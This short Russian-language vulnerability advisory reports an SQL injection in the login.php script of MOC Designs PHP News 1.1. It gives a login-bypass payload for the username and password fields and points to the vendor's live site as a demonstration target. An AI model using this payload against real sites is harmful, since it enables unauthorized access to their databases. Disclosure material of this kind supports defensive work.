Программа: MOC Designs PHP News 1.1

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных сценарием login.php. Удаленный пользователь может с
помощью специально сформированного запроса выполнить произвольные SQL команды в
базе данных приложения.

Эксплоит:

http://127.0.0.1/news/login.php

User : ‘or»=’
Password : ‘or»=’

Демонстрация:

http://www.mocdesigns.com/news/login.php



Оставить мнение